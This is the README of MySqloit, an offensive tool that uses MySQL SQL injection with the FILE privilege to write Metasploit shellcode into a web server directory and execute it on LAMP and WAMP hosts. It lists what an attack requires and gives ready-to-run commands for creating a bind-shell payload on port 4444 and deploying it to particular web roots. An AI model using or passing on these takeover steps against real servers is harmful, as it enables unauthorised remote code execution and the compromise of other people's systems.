Forked from: https://code.google.com/p/mysqloit/
MySqloit is a SQL injection takeover tool focused on LAMP (Linux, Apache, MySQL, PHP) and WAMP (Windows, Apache, MySQL, PHP) platforms. It can upload and execute Metasploit shellcode through a MySQL SQL injection vulnerability, using the FILE privilege of the injected database account to drop the payload into the web server directory.
- Linux
Features:
- SQL injection detection using the time-based injection method
- Database fingerprinting
- Web server directory fingerprinting
- Payload creation and execution
Requirements:
- FILE privilege on the MySQL account the vulnerable application connects with
- Web server and database server must be on the same machine (the payload is written to the local filesystem)
- Prior knowledge of the web server directory
- For the LAMP platform, if mysqld runs as a non-root user, a web server directory writable by that user is required
./mysqloit.py -h
Example:
Attacking LAMP
On recent versions of MySQL, mysqld refuses to run as root unless forced to (--user=root). In that case the payload can only be written to a web server directory that is writable by the account mysqld actually runs as (usually mysql).
Condition A:
- mysqld runs as the root user
- web server directory = /var/www
./mysqloit.py -p bind 4444
./mysqloit.py -e /var/www /
Condition B:
- mysqld runs as a non root user
- web server root directory = /var/www
- writable web server directory = /var/www/upload
./mysqloit.py -p bind 4444
./mysqloit.py -e /var/www /upload
Condition C:
- mysqld runs as a non root user
- web server root directory = /var/www
- writable web server directory = no writable directory
The exploit will fail: the mysqld account cannot write the payload anywhere the web server serves.
Attacking WAMP
On Windows, the MySQL service runs as LocalSystem by default, and LocalSystem can write anywhere on the filesystem, so a separate writable web server directory is not required.
Condition A:
- web server directory = C:\Program Files\Apache2\htdocs\
./mysqloit.py -p bind 4444
./mysqloit.py -e 'C:\Program Files\Apache2\htdocs\' '\'
(as in the LAMP examples, the second argument to -e is the writable directory relative to the web root; here it is the root itself)
Contact: muhaimindz@gmail.com
License: GPL v2